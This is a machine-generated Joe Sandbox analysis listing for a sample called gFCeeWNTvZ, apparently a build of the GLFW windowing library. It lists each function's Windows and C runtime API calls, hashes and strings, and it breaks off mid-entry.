Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Dragfree$Querycalloc$ByteCharFileFinishMultiPointWide
String ID:
API String ID: 1836115470-0
Opcode ID: b9272abd13468555675f69898f664f5edb0311e9bfe2851c4a022eed4932d34f
Instruction ID: 21f17271d0a1d0e5aecf1946cead42c5bd2f030e09ed4893c2bcaf0234a1ece6
Opcode Fuzzy Hash: b9272abd13468555675f69898f664f5edb0311e9bfe2851c4a022eed4932d34f
Instruction Fuzzy Hash: DF3168B4908704DFDB04EFA9C58869EFBF4FF89704F01891EE4989B250DB3498859B46

Function 64611F30 Relevance: 12.1, APIs: 8, Instructions: 55COMMON

Download Yara Rule

APIs

wcstombs.MSVCRT ref: 64611F58
malloc.MSVCRT ref: 64611F6C
wcstombs.MSVCRT ref: 64611F82
wcstombs.MSVCRT ref: 64611F9C
malloc.MSVCRT ref: 64611FB0
wcstombs.MSVCRT ref: 64611FC6
_assert.MSVCRT ref: 64611FD6
free.MSVCRT ref: 64611FDE

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: wcstombs$malloc$_assertfree
String ID:
API String ID: 3121319774-0
Opcode ID: d223843b4f0981c2eea8b4766b8890c5f573bf735871876db03f897de83d308e
Instruction ID: 56ca28514d4b1eca7c89cc07d14b80c7523b2de6cc68beb86310f996ff092ddc
Opcode Fuzzy Hash: d223843b4f0981c2eea8b4766b8890c5f573bf735871876db03f897de83d308e
Instruction Fuzzy Hash: DA11DDB440C7049FD300EF29C08469EFBF1EF8A654F11CA2EE59887350D7759489DB96

Function 64606BCB Relevance: 10.6, APIs: 7, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,64606DDE), ref: 64606BEC
GetProcAddress.KERNEL32 ref: 64606C29

Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: AddressLibraryLoadProccallocstrcpy
String ID:
API String ID: 3191970723-0
Opcode ID: 6d21702410a0b7366d64fda7284359eda90acc1b2dcf1eb05de0a7ddf4f8dc4e
Instruction ID: f0646acfb52e7e7914e8e69514eb6b0ed57cf7e0ba1799fa8941cc7d4de1ebcc
Opcode Fuzzy Hash: 6d21702410a0b7366d64fda7284359eda90acc1b2dcf1eb05de0a7ddf4f8dc4e
Instruction Fuzzy Hash: B04118B090C3519BD716AF65D64439EBBF4EF66B48F01E85EE8848B240D77988C4CB53

Function 646086AB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32 ref: 6460870F
VerSetConditionMask.KERNEL32 ref: 6460872B
VerSetConditionMask.KERNEL32 ref: 64608747
RtlVerifyVersionInfo.NTDLL ref: 64608765

Strings

#, xrefs: 6460875A
, xrefs: 64608738

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersion
String ID: $#
API String ID: 2793162063-2491617062
Opcode ID: 7dee0b40ec2958011d88d923daa984bfca8fb5401a2ecf77b084f30c4cbb9e4c
Instruction ID: 8ac03f99b4996b812ac9ca3971312d0a604f99c29dc6038d0a7191f675425ea0
Opcode Fuzzy Hash: 7dee0b40ec2958011d88d923daa984bfca8fb5401a2ecf77b084f30c4cbb9e4c
Instruction Fuzzy Hash: 6011DAB08083089FDB10AF69C5493AEBBF4EF88354F00C85DE89887281E3B99554CF82

Function 64609118 Relevance: 10.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 6460915A
memcmp.MSVCRT ref: 64609187
memcmp.MSVCRT ref: 646092B0

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 2e52f2b98325dc52c0b51982dec49706dfa811e7d710c57d7612a5bbb7f5f683
Instruction ID: df5c36a09866d2bcf33a00dd3babb0bf3a192e59e48267d6dc1dba8cacacb17f
Opcode Fuzzy Hash: 2e52f2b98325dc52c0b51982dec49706dfa811e7d710c57d7612a5bbb7f5f683
Instruction Fuzzy Hash: 8551F5B0A08745DBEB05DF19C68479ABFF1EF95748F00C81DE8988B294E374D489DB82

Function 6460A331 Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 6460A359

Part of subcall function 64609F84: EnumDisplaySettingsW.USER32 ref: 64609FF5
Part of subcall function 64609F84: CreateDCW.GDI32 ref: 6460A01F
Part of subcall function 64609F84: GetDeviceCaps.GDI32 ref: 6460A05B
Part of subcall function 64609F84: GetDeviceCaps.GDI32 ref: 6460A070
Part of subcall function 64609F84: DeleteDC.GDI32 ref: 6460A164
Part of subcall function 64609F84: free.MSVCRT ref: 6460A186
Part of subcall function 64609F84: wcscpy.MSVCRT ref: 6460A1B4
Part of subcall function 64609F84: WideCharToMultiByte.KERNEL32(00000000), ref: 6460A202

EnumDisplayDevicesW.USER32 ref: 6460A3B9
EnumDisplayDevicesW.USER32 ref: 6460A41F
wcscmp.MSVCRT ref: 6460A469
wcscmp.MSVCRT ref: 6460A4ED
free.MSVCRT ref: 6460A565

Part of subcall function 646057C8: realloc.MSVCRT ref: 646057FC
Part of subcall function 646057C8: memmove.MSVCRT ref: 64605825

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: DisplayEnum$CapsDeviceDevicesfreewcscmp$ByteCharCreateDeleteMultiSettingsWidecallocmemmovereallocwcscpy
String ID:
API String ID: 579719053-0
Opcode ID: 9917d3392d3a617b4d7d2ab2030af2b87a8db3f159270d7fa2b6180cf961cf81
Instruction ID: dcd89fd2c13b460c3e6eb5867185efa4242b4b2248a255bf9b5c91e267a74ee1
Opcode Fuzzy Hash: 9917d3392d3a617b4d7d2ab2030af2b87a8db3f159270d7fa2b6180cf961cf81
Instruction Fuzzy Hash: A9514EB19083158FEB15DF28C94439EBBF5BFA5784F00C8ADD888A7200E776D9958F42

Function 6460BD39 Relevance: 9.1, APIs: 6, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 6460BD5C
GetSystemMetrics.USER32 ref: 6460BD68
GetClassLongW.USER32 ref: 6460BE53
GetClassLongW.USER32 ref: 6460BE6A
DestroyIcon.USER32 ref: 6460BECD
DestroyIcon.USER32 ref: 6460BEE1

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: ClassDestroyIconLongMetricsSystem
String ID:
API String ID: 902249451-0
Opcode ID: ab1f1fc866288ddce23ccd6ea3318ccb7c23821cc0cae89833419a73b4b51bfe
Instruction ID: 713f0ba8414f9aa3487a0b640c95419bedf34daf1fda783aefc2163a129a0fcc
Opcode Fuzzy Hash: ab1f1fc866288ddce23ccd6ea3318ccb7c23821cc0cae89833419a73b4b51bfe
Instruction Fuzzy Hash: C8517A71A04205DFDB04EFA9C9486AEBBF9EF89710F01C529E898DB390DB789841CF51

Function 64601020 Relevance: 9.1, APIs: 6, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,646012C1,?,?,?,?,?,?,646013D3), ref: 64601057
_amsg_exit.MSVCRT ref: 64601085

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 40c6d0a2b95b52d6a4fe3d8224c7018e8a76ef40fb9e2947438d67cfd26b18a5
Instruction ID: d62b50c69b97806eec955e296aaed03516669fdb76f59aa6d42e2eb3e52d9b3f
Opcode Fuzzy Hash: 40c6d0a2b95b52d6a4fe3d8224c7018e8a76ef40fb9e2947438d67cfd26b18a5
Instruction Fuzzy Hash: 03418F7164C290CBE716EF5AC68139B7BA0EB66748F40C52DE4848B241DB77C580CBD2

Function 64609317 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 64609377
free.MSVCRT ref: 6460939E
free.MSVCRT ref: 646094B4

Strings

, xrefs: 646093D4
, xrefs: 646093CA

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: free$calloc
String ID: $
API String ID: 3095843317-227171996
Opcode ID: fff1826f8f0f02b24e857272bbaad84b7210f0ba0c4f2043c4bad887d9e7d85c
Instruction ID: 37b25af67d1840a2031605d6addd8f798cfa9e2af2e1ac235572a749ba1644fb
Opcode Fuzzy Hash: fff1826f8f0f02b24e857272bbaad84b7210f0ba0c4f2043c4bad887d9e7d85c
Instruction Fuzzy Hash: 7041E870908718CFDB65DF29C9847D9BBF1EB89708F0088A9D59C97250D7759A88CF82

Function 6460B4A7 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 6460B4B8
WindowFromPoint.USER32(64633B20,?,?,?,?,?,?,?,?,?,?,?,?,64633B20,?,6460E287), ref: 6460B4D4
GetClientRect.USER32 ref: 6460B4EE
ClientToScreen.USER32(00000000,00000000), ref: 6460B509
ClientToScreen.USER32 ref: 6460B51D
PtInRect.USER32 ref: 6460B532

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Client$RectScreen$CursorFromPointWindow
String ID:
API String ID: 3638364385-0
Opcode ID: 655dac294b05172c6d6022f6583b98ecc00e09523a12974f6cd1c6196573df2d
Instruction ID: 3b0094546bf2133344687ff90385f188bb14cb557acdc0aefd7f0507a1609907
Opcode Fuzzy Hash: 655dac294b05172c6d6022f6583b98ecc00e09523a12974f6cd1c6196573df2d
Instruction Fuzzy Hash: C711DDB5909614EFCB01EFA9D98499EBBF8FF89B11F01C429E988D7205D7309805CB61

Function 6460A5C3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765

GetDC.USER32 ref: 6460A61D
GetDeviceCaps.GDI32 ref: 6460A637
GetDeviceCaps.GDI32 ref: 6460A649
ReleaseDC.USER32(73A24620,73A24620), ref: 6460A65B

Strings

Z, xrefs: 6460A63E

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: ConditionMask$CapsDevice$InfoReleaseVerifyVersion
String ID: Z
API String ID: 1822872229-1505515367
Opcode ID: 6a18b85b7a8642ca080b40cb02792ace88e6e28788add9c392d4be4475e20ab3
Instruction ID: 707d5dd32e3a15a051cc870e2508f533cae2b5a77f41d0fd4278f5d9a3e11ce2
Opcode Fuzzy Hash: 6a18b85b7a8642ca080b40cb02792ace88e6e28788add9c392d4be4475e20ab3
Instruction Fuzzy Hash: 6B21D5B0908619EFDB049FAAC94879EBBF4FF49755F01C41AE89897240D7789414CF51

Function 646019DC Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 90COMMON

Download Yara Rule

Strings

Cannot query extension without a current OpenGL or OpenGL ES context, xrefs: 64601A43
JCad, xrefs: 64601ACF
glfw/src/context.c, xrefs: 646019F4
extension != NULL, xrefs: 646019FC

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Valuestrlenstrstr
String ID: Cannot query extension without a current OpenGL or OpenGL ES context$JCad$extension != NULL$glfw/src/context.c
API String ID: 1011161555-1144784644
Opcode ID: 3b3b6993832a73cefe9d8a3578806f8ac418a9833aed2703d4bc951321dd21bc
Instruction ID: ab578d73ec95341dca835a5dd6844567f22864d8ff57f30a04dc3bc4f80d642d
Opcode Fuzzy Hash: 3b3b6993832a73cefe9d8a3578806f8ac418a9833aed2703d4bc951321dd21bc
Instruction Fuzzy Hash: 2D3129B0A482059FD7059FA9C6446DEBFF4EF95B48F01C92EE8C88B201E7B58481CB52

Function 64611DF0 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 64611E09
_unlock.MSVCRT ref: 64611E31
calloc.MSVCRT ref: 64611E7F

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: fb47cb68cad1c4fe699bf62163b22cfa841e423b213ee8d5781f7575e1c3bea3
Instruction ID: 7226391e82f3ffb54ddf767a3f68459dd85a18fc98c3cf3d1ef2e38c82678296
Opcode Fuzzy Hash: fb47cb68cad1c4fe699bf62163b22cfa841e423b213ee8d5781f7575e1c3bea3
Instruction Fuzzy Hash: 862129706082018BE700DF6CC4C079A7FE1BFAA354F54C669D4988F299EF34D841CBA2

Function 646036A2 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 57stringCOMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 646036F5
calloc.MSVCRT ref: 6460370E
calloc.MSVCRT ref: 64603721
strncpy.MSVCRT ref: 6460374A

Strings

, xrefs: 64603738

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: calloc$strncpy
String ID:
API String ID: 3831826497-3916222277
Opcode ID: 3ecbbced3f8f1552e037da450b4e3eb8689c922739d62125c82275acb59299c6
Instruction ID: 67085ad108993bd3ce5493b9702836e3a77efd71178ef21b3a30bf35c66d437d
Opcode Fuzzy Hash: 3ecbbced3f8f1552e037da450b4e3eb8689c922739d62125c82275acb59299c6
Instruction Fuzzy Hash: DB21D6B0908245CFDB04EF68D685A8ABBE4EF59714F41886EE8488B302D775D885CB92

Function 6460D4A1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111windowkeyboardtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B02F
Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B03F
Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B051
Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B063
Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B06F
Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B081
Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B092

MapVirtualKeyW.USER32 ref: 6460D4D6
GetMessageTime.USER32 ref: 6460D4F9
PeekMessageW.USER32 ref: 6460D528

Strings

,, xrefs: 6460D5C5

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: State$Message$PeekTimeVirtual
String ID: ,
API String ID: 1171625170-3772416878
Opcode ID: 4ee1db7b8f5ffe9687f9134610cfb6f340ffa0424a311f8317f69ea6582160f0
Instruction ID: 6c46310d30a11a7dc731c5c7cee37011acf60de45a34a29a6c8da7496cf55ec6
Opcode Fuzzy Hash: 4ee1db7b8f5ffe9687f9134610cfb6f340ffa0424a311f8317f69ea6582160f0
Instruction Fuzzy Hash: 1451AEB0908709DFDB09DFA9C58469EBBF0BB85715F10CA2EE8989B251D7749884CF42

Function 6460B0A6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000000), ref: 6460B0C0

Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765

SystemParametersInfoW.USER32 ref: 6460B10C
SystemParametersInfoW.USER32 ref: 6460B130

Strings

Hcd, xrefs: 6460B0F5

Memory Dump Source

